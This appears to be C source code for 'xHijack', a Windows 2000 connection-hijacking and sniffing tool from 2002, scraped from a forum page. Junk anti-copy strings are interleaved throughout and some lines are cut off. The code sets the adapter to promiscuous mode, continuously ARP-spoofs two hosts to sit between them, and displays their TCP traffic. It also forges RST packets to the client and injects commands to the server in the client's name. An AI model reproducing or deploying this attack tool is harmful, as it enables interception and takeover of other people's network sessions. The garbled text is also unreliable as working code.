3 V$ P) |+ g2 j% P+ n2 U8 U- x PIP_ADDR_STRING pIPAddr; ; O9 T* z8 c8 n& i$ o //Get The list of Adapter , ~* \; i. o+ B# A; r, c if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) ; G* _4 P3 S, i. T2 K! r( @1 n' U { . d6 h! _' M% s W6 y- _ printf("Unable to retrieve the list of the adapters!\n"); 9 Y# j# \" x" G/ L, C2 z* u return 0; 4 n$ R$ @5 v; W } ( ^/ g( t3 }. Q6 [% q: u5 J temp = temp1 = AdapterName; i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) / i' u) q- \* @5 {1 T9 M2 H { + W2 F/ h6 i: V. }! n) n9 C3 Y. h: l/ D if (*temp == '\0') 1 T% b( d2 C. _8 O { memcpy(AdapterList,temp1,(temp-temp1)*2); printf("%d - %S\n", i+1, AdapterList); temp1=temp+1; i++; 9 |8 F/ s& {9 e8 @8 [/ ?4 \9 o8 |, } } temp++; # t4 J$ j5 ~# H+ N9 J } , ~1 \7 c& V& N) q; l //choose adapter ' W. z: H% y6 s g0 r0 b% P) C5 R while((iAdapter <= 0) || (iAdapter > i)) 3 e, d' A3 }9 q' f { 2 u O: i: X4 k" _9 z5 o& ] printf("\nPlease choose your Adapter:"); ; ~! a8 a. u* n) [0 s scanf("%1d", &iAdapter); / a* i; {6 z( x$ u } W9 }0 m+ J8 o3 n; v" P printf("\n"); //---------------------------------------------// //这里调用iphlpapi来取得本地ip_addr和mac_addr sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); / L$ _6 y c; Y/ [/ Q' R3 R dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_BUFFER_OVERFLOW) " F2 y8 `% i8 B. X; w { ) U1 T' u" v8 M! z, D& Z printf("GetAdapterInfo error:%d\n", GetLastError()); / ` b$ d0 C: \8 r* P H return 0; } pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); if(!pAdapterInfo) { printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); ( H$ {" U4 N4 d& N6 n7 ^ return 0; $ `# B: l) g. I+ J: Y) X+ @ } - q% X4 S9 P$ _- T7 S6 w- n dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); if(dwRet != ERROR_SUCCESS) { * {' {" }" n! E2 ^, |6 J, W" v printf("GetAdapterInfo error:%d\n", GetLastError()); return 0; } , |1 |: \2 U- l6 E3 E pTmp = pAdapterInfo; while(pTmp) ( ^: t2 ~" x, ]- f( F! v5 | { //字符匹配

韩冰

if(strstr(szSelectAdapterName, pTmp->AdapterName)) { 9 ]% x8 P4 k9 H3 m z, I8 K* S //found it,get own adapter mac address $ }' ?0 `8 P' C5 X7 B- u9 T memcpy(g_szOwnMAC, pTmp->Address, 6); //get ip address pIPAddr = &pTmp->IpAddressList; 0 i! ?7 |8 u! N9 M$ z while(pIPAddr) { g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); ! w# q4 S4 F; s; N pIPAddr = pIPAddr->Next; % K4 B0 O9 m. _- }2 \2 p2 ^0 U2 Z if(g_TotalIP >= Max_Num_IPAddr) break; 7 d2 Y3 ~! f* V) K! g } 6 H6 _- K, K/ x break; 3 D! e3 H- @3 ~. G% o } " u$ f* q; S" q( ^ pTmp = pTmp->Next; , O% _( I! H' L' E' M, U } free(pAdapterInfo); //not found,return zero if( (!pTmp) || (!g_TotalIP) ) return 0; //---------------------------------------------// //open adapter , T B! S: Q" w. h% I( n lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { 8 I% {# k- D# |" z7 l( m, V& ] iRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx\n", iRetCode); 4 H% t0 ]: \" p% f return 0; } 5 q' @! }+ L& G // set the network adapter in promiscuous mod if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) { printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); 8 B1 E$ v# }9 Y% X if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) { printf("Unable to set ALL_LOCAL mode!\n"); O% o. f' {+ b/ ?+ H/ A return 0; } } / }/ O. F7 Y3 F7 L // set a 512K buffer in the driver if(PacketSetBuff(lpAdapter, 512000) == FALSE) { printf("Unable to set the kernel buffer!\n"); ; j7 f( j7 v3 ^* b) I return 0; } // set a 1 second read timeout if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) ' J6 d% M! F" B; V, a' _ printf("Warning: unable to set the read tiemout!\n"); 5 m ] l1 x5 f) v* g if(PacketSetNumWrites(lpAdapter, 1) == FALSE) printf("warning: Unable to send more than one packet in a single write!\n"); //设置发送的packet g_lpSendPacket = PacketAllocatePacket(); / V5 n2 |. E2 O) |! h6 q% o0 g if(g_lpSendPacket == NULL) 2 x9 {+ J+ I4 i: _4 b { ' d7 A. K# l$ m: H* f printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); return 0; } ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); return lpAdapter; } 2 ?, Z: L( L, F# y//功能：帮助信息 void usage() { printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" 3 A. @3 M3 p% c- J "By eyas 2002/8/19\n" "http://www.ey4s.org\n" "Thanks to Refd0m and shotgun\n\n" "Usage: xHijack ServerSide ClientSide\n\n"); } // ! U/ b) {' ]3 t8 C4 r7 t. U6 {//功能：显示数据包的一些详细信息 // VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) 0 }$ Q/ R/ I ~" S% _5 d0 M{ SOCKADDR_IN saDest, saSrc; unsigned char FlagMask; int i; 1 r l+ r* w0 w! i saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); / Q1 o5 q. ^& s+ q //display TCP flag for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) 6 G0 s3 n; V- W1 C5 z# D- k8 s { if((pTCPPacket->tcphdr.th_flag) & FlagMask) 4 Y. t% t% @ y0 H6 u8 P5 @0 q printf("%c", g_szTcpFlag); else printf("-"); } printf("\n"); //如有需要，可显示更多详细的信息 , R- U) S8 Y+ }7 `' e if(bDetail) ! Q3 v( ^7 C5 B" r. p+ f printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); } + c4 e8 b) f) C9 `; `' ]7 _ " }# a+ B( [) ?' q4 b; b// //功能：处理收到的数据包(只分析本不属于自己的包)，然后根据用户输入，完成各种功能 9 u: k" X+ {4 c- }1 m7 w1 z: T// DWORD WINAPI AnalysePacketsThread(LPVOID lp) { ULONG ulBytesReceived; ( P, \4 I6 Y: u USHORT usDataLen; : C' n, P. g0 D //USHORT usIPHeadLen, usTCPHeadLen; - E4 D0 v9 S, `8 r char *buf; $ H0 W S/ P7 h# X: _$ N u_int off, i; + d8 ~. S; b( V. y* M( F, R, n PTCPPACKET pTCPPacket; 1 Z& z! G1 L: _* b struct bpf_hdr *hdr; LPPACKET lpRecvPacket; char szPacketBuf[256000], *pStr; BOOL bDeleteNode, bAddNew; 5 ^/ m U0 l# |% A1 I4 ? DWORD ident;//当前所处理的数据包，所属的连接的唯一标识 BOOL bClientToServer;//数据包是否从客户端发送到服务器端 $ ^ b( a# G3 n* [1 J: t //设置接收的packet lpRecvPacket = PacketAllocatePacket(); 9 o, Y4 v# [6 f P$ }' D if(lpRecvPacket == NULL) { printf("Error:failed to allocate the LPPACKET structure for recv.\n"); ; I2 _' M9 V, K5 z3 |+ i% z5 W return 0; } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); ( M4 }, J' L: z1 L PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); , v+ c: \3 h) \4 b4 s while(1) ) y& R. {: n, j' H { // capture the packets 7 x' X. G# G9 q. t% } if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) 4 d* G+ Z* ~+ q. @; T, v( O/ R2 I { printf("Error: PacketReceivePacket failed.\n"); break; # b4 p; u) J: B8 x- d# f } / x: F9 `& h( a ulBytesReceived = lpRecvPacket->ulBytesReceived; buf = lpRecvPacket->Buffer; ' w' o+ ?8 e* y* ` off = 0; while(off < ulBytesReceived) % j! B l/ M8 r+ c1 Z7 u# _ { hdr = (struct bpf_hdr *)(buf + off); off += hdr->bh_hdrlen; pTCPPacket = (PTCPPACKET)(buf + off); " h: T5 k' }& q g off = Packet_WORDALIGN(off + hdr->bh_caplen); //不需要处理自己发出的包(转发或本机发送的) if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; , e( `$ e _7 S5 x Q //检查是否IP包 V, T2 M/ H1 p: _1 N if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; % r* o* R6 A; J; C! D0 M0 A: h //检查是否TCP包 if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; //也不处理DestIP是自己的包 " v$ w# h4 D9 K; p1 a4 y for(i=0; i

韩冰

pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
, j5 h' Y: ~9 N  ?' b4 m          }
          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
2 ]# f. S+ d( `5 k2 W          {
            //send rst packet to client
, @" p& Y1 k& _  w' u2 s            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq);
            //send hijack packet to client
            SendHiJackPacket(pTCPPacket);
            //reset action flag
$ ^( n1 s" _8 D; u- w            ResetActionAllFlag();
4 R: y/ ~; \/ ~! R1 M          }
        }
, p7 s- P: v. }" Z! e0 n        //show the tcp data
) a, H# M# b) @        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) )
( A- _& @( y3 Z% r7 X        {
" b2 F- W" Z/ b* }" g' z          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //暂不考虑IP、TCP头不是20字节的情况
          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
          pStr = (char *)pTCPPacket + 54;
  Q( S5 z& g* r5 c* h          for(i=0; i        }
# O" l: i3 H8 }  ?      }
( W- K: x1 k3 V" ?      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
  }//end of recv packets while
  PacketFreePacket(lpRecvPacket);
  return 0;
- Z( ?7 J4 q4 U9 h/ T! ]4 H8 m}

) w& `6 d  o7 A* Y
9 Q: i( R! T2 L* b9 B" ]# @' `//
9 F0 C$ Z5 u' i9 @! L" A//功能：操作记录所有连接信息的单向链表
) `# T6 O/ Z3 {- t8 x//
* u. h) z" ^  {" H1 u" d* ^# ~+ c6 @DWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP,
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
3 F4 w! ^: r! \/ K0 N5 {+ u# U& k{
  PCONNINFO  pNew, pTmp;

  pTmp = g_pConnHead;
! d6 H+ j+ a+ y1 @& V, x4 A  while(pTmp)
$ T# J* o4 r6 v3 g) n5 h8 `  {
    if(pTmp-&gt;bActive)
    {
      //found it
      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp;
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp;
' h9 g1 R* m5 C. F        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp;
        (pTmp-&gt;uClientPort == uClientPort) )
      {
- E3 [) _2 I7 ~0 M7 d        if(bDelete)
2 \% V# X2 l; `% m        {
- s% i+ D* ]1 u/ y2 M4 z) ~: ?          pTmp-&gt;bActive = FALSE;
# V3 E) b/ d% p          return 0;
        }
        else return pTmp-&gt;ident;
4 L/ l/ t2 }; l9 j/ H      }
    }
    pTmp = pTmp-&gt;Next;
  }
  //not found, create new node
# I3 i$ i( c& l  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) )
) u2 i. O5 M3 K. ?0 H( b  {
; y3 e! S, Z! f3 `' |& V7 H1 {/ r    //search unactive note
    pTmp = g_pConnHead;
    while(pTmp)
    {
% w$ V$ x* h, p$ L; k/ E7 h      if(!pTmp-&gt;bActive) break;
      pTmp = pTmp-&gt;Next;
& `$ z4 r( |4 @" V    }
    //found a unactive node
    if(pTmp)
$ D2 S- N; X' I4 Y% w    {
! e. g( }/ q1 K( y3 ]      pTmp-&gt;dwServerIP = dwServerIP;
( S( Z  ?1 R: _# |7 ^      pTmp-&gt;uServerPort = uServerPort;
      pTmp-&gt;dwClientIP = dwClientIP;
      pTmp-&gt;uClientPort = uClientPort;
      pTmp-&gt;bActive = TRUE;
- A' `) ^+ G$ I5 N      return pTmp-&gt;ident;
    }
8 r; R3 W* @, Z7 Y    //not found,create new node
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
6 j3 ?# V" f# X& A. X    if(!pNew)
    {
0 r5 y8 G1 `/ O$ \      printf("malloc for link node error:%d\n", GetLastError());
, ]5 N1 D( \0 J8 z      return 0;
    }
    //fill the struct
    pNew-&gt;bActive = TRUE;
    pNew-&gt;dwServerIP = dwServerIP;
& j% S3 x/ p; v8 L    pNew-&gt;uServerPort = uServerPort;
    pNew-&gt;dwClientIP = dwClientIP;
0 z8 X! a+ a& r! `! g, o# X* k    pNew-&gt;uClientPort = uClientPort;
    pNew-&gt;ident = ++g_ident;
+ J% a0 o! [. j" t5 j    pNew-&gt;Next = NULL;
3 P- s% d1 }/ e3 F7 |    //add new node to link
, e+ q4 i) J2 L; u    if(!g_pConnHead)
      g_pConnHead = g_pConnLast = pNew;
: A; n# `/ |( d1 w( c! [    else
    {
      g_pConnLast-&gt;Next = pNew;
      g_pConnLast = pNew;
    }
* C" z4 [. }: ^* X$ R0 S    return pNew-&gt;ident;
  }
  return 0;
  l! }2 Z) E7 y}

! n. ?0 Q; r. P: q; p+ G//
: f( x# M) R& [' i0 y//功能：判断一个数据包是不是只有ACK标志
//
BOOL IsACKPacket(unsigned char flag)
  n3 E0 E* o* R1 x4 J5 y. Q{
8 O( R# y% _  P9 f+ d4 C  int  i, j=1;
+ k% @6 n2 f- B/ C' R! d, h  for(i=0 ; i&lt;4; i++)
  {
# E; [0 g  Z2 M* @8 Q    if(flag &amp; j) return FALSE;
3 D, c2 J6 k5 b6 \. E  B    j &lt;&lt;= 1;
* m7 t+ \! D! C5 q$ ]  }
+ t3 |, f5 q; N' G2 o3 E! A; {  if(!(flag &amp; 0x10)) return FALSE;//is ack?
6 x; Q9 l! A% A0 K7 w7 j7 t6 N  if(flag &amp; 0x20) return FALSE;
1 T. Z* G' L, U1 T+ \5 b  return TRUE;
}

//
9 e/ k1 N, d% ^8 X2 a# t& O( l! L//功能：伪装成Client给Server发送数据包
//
BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
; `, z: K+ R4 g5 q{

  char    szBuff[1520];
  PSDHDR    psdhdr;
  PTCPPACKET  pHiJackPacket = NULL;
( H, v9 n1 w( e4 m! W* a  BOOL    bRet = FALSE;
" {2 ?6 i% y3 A3 q7 P5 U$ M
, G1 {/ D2 V6 |" \  __try
/ I: W* c: R: D, ]5 j  {
    //
0 @. i% |' x' S% k. A" F. ?    if(!g_pCurrCtrlConn) __leave;
' h, j2 L6 G) I. D, f5 T" x    //allocate memory for hijack packet
+ w) F8 S$ Z# U) I    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pHiJackPacket)
    {
      printf("malloc error:%d\n", GetLastError());
      __leave;
2 [- E* W$ [9 T% I9 G, U: f    }
* o9 t% @( _: ?2 F0 f$ r    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
    //-------------- modify the packet ---------------//
    //modify ethernet head
7 m1 l' O9 e' }7 M& \    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
  `: K* N% O$ B; f$ p    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    //modify ip head
; H! z2 e8 n% {( K! w( d- |    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
- A4 U& `1 H% {6 p3 m  c9 V    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
3 r3 u" ?2 d# \$ M  x; f. X* E% Q) n    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1
+ _6 V7 w1 m. P8 w9 D, f7 h: X7 I    pHiJackPacket-&gt;iphdr.checksum = 0;
1 o% [  z# }, W+ l    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址，伪装成client
    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址，接收hijack包的地址
    //modify tcp head
& m6 A# Q4 B* q- M3 k    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
) {" M+ F( z" m8 o- H0 G9 u    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
# z% n6 n4 `) v    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
    pHiJackPacket-&gt;tcphdr.th_sum = 0;
    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
    //fill tcp psd head
    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len
    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
4 K7 i4 x% Q+ X/ ]% p    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
! b; o: Y5 i, P9 W5 |. F6 M" w    //calculate IP checksum
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
* M$ u8 Q5 o2 ]+ L+ d    //fill send buffer           
* y4 E3 w7 x8 p    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET));
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand));
5 ^9 Y, j, Z- B/ W& P" J. P    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4);
, y9 X% @; E. M% S, f    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
) g1 R" \% `. }0 B    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
: f0 v/ n& }. o5 B: N    {
      printf("Error sending the hijack packets!\n");
      __leave;
1 M! D: q5 ~6 }" l) O2 P0 D; P    }
    else printf("Send hijack packet ok!\n");
. h$ z9 F, g1 V7 U    bRet = TRUE;
+ Z$ _/ a8 S- r1 R# ?3 x  }

韩冰

__finally
* b) Q( c8 ^/ L' C) }  {
    if(pHiJackPacket) free(pHiJackPacket);
  }
0 e- Y( P9 \$ r( Y1 m8 R  return bRet;
3 g3 a1 g2 R1 _; n}

2 F) {) _- f- z. V+ t. r. f5 G
/ q, m: U, l  f' x& ~/ Z//
//功能：伪装成Server给Client发送rst包
//
9 n8 r+ L; k+ i, IBOOL SendRstPacket(unsigned int seq, unsigned int ack)
7 j7 D! }9 a) E: ?{
  char    szBuff[60];
9 @) n. v5 J, Z( N/ y& V5 k) h  PSDHDR    psdhdr;
/ _% G! t3 `3 T( u  m; j: p/ a5 c" X  PTCPPACKET  pTcpPacket = NULL;
  BOOL    bRet = FALSE;

7 i6 j) w9 U: i2 ^4 w  __try
; W. ]* g! e$ {- s  `8 i  {
# G/ v* K: I) C; h  O    //检查当前指向想控制的连接的信息的指针是否为空
    if(!g_pCurrCtrlConn) __leave;
, ?8 {) y7 A! C  e1 ]! q4 `$ p    //allocate memory for rst packet
# T9 {6 `/ k8 W7 R* j) h' E    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
    if(!pTcpPacket)
/ o5 x1 G3 a% \2 W+ O( g; n    {
! x$ A2 E0 `; R" B" Y      printf("malloc error:%d\n", GetLastError());
      __leave;
. R( X& u4 W; O+ O3 K1 v1 t    }
    //fill ethernet head
    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
$ u( m" l' K6 \( p3 ~3 E    //fil ip head
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
% _$ j7 u- Y) E    pTcpPacket-&gt;iphdr.tos = 0;
3 g' Q+ p8 Z! _    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR));
. c2 v7 X$ j. f, w, C( I    pTcpPacket-&gt;iphdr.ident = 1;
    pTcpPacket-&gt;iphdr.frag_and_flags = 0;
    pTcpPacket-&gt;iphdr.ttl = 128;
! D  V9 V, D7 Z% b6 l+ z2 {    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP;
    pTcpPacket-&gt;iphdr.checksum = 0;
. t- ?+ P- P3 C    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址，伪装成服务器的
+ E* Q8 f& B: n8 @( T2 Q: o+ L) D8 @    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
    //fill tcp head
; @; n/ l/ e* a# f( t' ^5 z+ D( W    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号，伪装成服务器的端口
. w6 ^3 A# s2 J9 Y( j    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK
9 Q! R( i7 o$ K    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
  B' t7 A# }! B% P) b0 e6 f    pTcpPacket-&gt;tcphdr.th_win = 0;
' F; q, H$ `3 \; f, P    pTcpPacket-&gt;tcphdr.th_urp = 0;
    pTcpPacket-&gt;tcphdr.th_sum = 0;
    //fill tcp psd head
6 D0 {. m0 w0 e  B0 ^    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           
) I8 R: ]$ A' K3 C& l' W8 Z  D6 |4 j. W    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           
    psdhdr.mbz = 0;
    psdhdr.ptcl = IPPROTO_TCP;
, P3 Y5 J/ A; I" l  D# j    psdhdr.tcpl = htons(sizeof(TCPHDR));
    //calculate tcp checksum     
    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR));
- e& G5 Q8 {4 a1 ?1 V& f4 p+ [    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR));
    //calculate IP checksum
    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR));
0 m$ f  N% W- x% l  G$ c    //fill send buffer
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET));
$ B8 Z" `8 R: X3 N8 C/ ]    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE)
    {
      printf("Error sending the rst packets!\n");
+ }7 }1 M1 L# K! t; W  \      __leave;
- B( b' e2 }; u  G    }
' `; ]- r7 O/ k  v& j) l- e( F    else printf("Send RST packet ok!\n");
    bRet = TRUE;
  }
  __finally
  {
    if(pTcpPacket) free(pTcpPacket);
6 ^, D  n: H" F- y' X' i. ^  }
  return bRet;
}

: j" r$ Q! i9 Q4 N  Y//
//功能：计算校验和
//
USHORT checksum(USHORT *buffer, int size)
{
1 Q5 X/ A3 s( u0 u0 n unsigned long cksum=0;
8 a; {# S7 `% R: Z  f9 } while(size &gt;1) {
, V( z; v6 m' W& B2 f  cksum+=*buffer++;
! ]2 j( [2 o# H- y7 _9 O  size -=sizeof(USHORT);
}
6 T3 _* l! b- C! j. W( ^  p if(size ) {
. f0 [' S! P) i4 I- |  cksum += *(UCHAR*)buffer;
% S8 p9 p: f0 j- i: O" c) d3 } }
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
) ^: ^/ z) E/ W& e) ~ cksum += (cksum &gt;&gt;16);
  b3 A& Y9 p$ _# R8 y return (USHORT)(~cksum);
3 c5 ^0 X1 A: E! N! O8 Q}

//
+ u& S3 x' G" A: K$ Z% e. z! k" d//功能:实施ARP欺骗
6 w& J" _9 |( z% ?5 x* D//1 告诉ServerSide,ClientSide的mac是ownmac
. e1 K& f* D/ x6 j  }//2 告诉ClientSide,ServerSide的mac是ownmac
//
! X$ X% S& y: Q+ d7 S) b5 ^& [! hDWORD WINAPI ArpSpoofThread(LPVOID lpType)
/ I2 G) J: z) |7 l% E( _  |; g! P{
  int  iType = *(int *)lpType;
* l! O$ H4 q( D/ J) Z  E1 C  ARPPACKET  ArpPacket;
  LPPACKET  lpArpPacket;
# T4 ^5 M8 ~. Q% |) I  w6 I6 _* p  char    szArpBuff[60];

1 |/ F- d4 i) Q0 X5 f9 O1 r  switch(iType)
2 O& {4 [: P! j; y4 B8 k# e& e' ?  {
    case 1:
      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ServerSideIP;
: _/ f6 ?: P( y: V      ArpPacket.arphdr.SourceIP = g_ClientSideIP;
      break;
    case 2:
" o( v7 s% F) R9 f      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6);
      ArpPacket.arphdr.DestIP = g_ClientSideIP;
4 q! H  M: m# d, W7 p      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
      break;
5 v  s* W% |& ]" `- n! g    default:
      return 0;
  }
: h5 \8 m7 K" d  //ethernet head
( w6 h3 `/ Q  s% ^. e% `4 d  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6);
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
  //arp head
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
5 J& R- S; l) z  y" _. L) b' K  ArpPacket.arphdr.ProAddrLen = 4;
  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
  ArpPacket.arphdr.ProType = htons(EPT_IP);
  ArpPacket.arphdr.op = htons(2);//arp reply

/ g- n; t1 Y; |' Q$ R$ l- I  lpArpPacket = PacketAllocatePacket();
/ P1 {9 }/ h  O( l/ D  if(lpArpPacket == NULL)
  {
7 i3 I' e) y( C5 Q2 E, M    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
    return 0;
( {" z0 O- ?. r+ V$ c  }
& z$ {" v, m5 e' f$ O% p  memset(szArpBuff, 0, sizeof(szArpBuff));
1 o4 j, Q8 U7 @0 L. u( W  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
; P# K3 j0 e9 l0 ?1 a  //send arp packet
; u3 W3 Z3 n1 o( x% E# K+ Z, P  S  while(1)
8 f9 ~$ `/ E6 j% Y0 r; R  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
" k1 A: j* z& H    {
      printf("Error sending the arp spoof packets!\n");
- B" P9 e+ z' y0 |      return 0;
+ q4 {9 W! _: _    }
$ P4 t9 B# F, w( x7 Q; H    Sleep(1000);
7 i1 H( Z6 |" F" b: e2 Y7 T# Z  }
  return 0;
$ g* Q0 T. o% A0 _7 g, N3 p$ g}
" V  z' s5 n1 \( B6 V
//
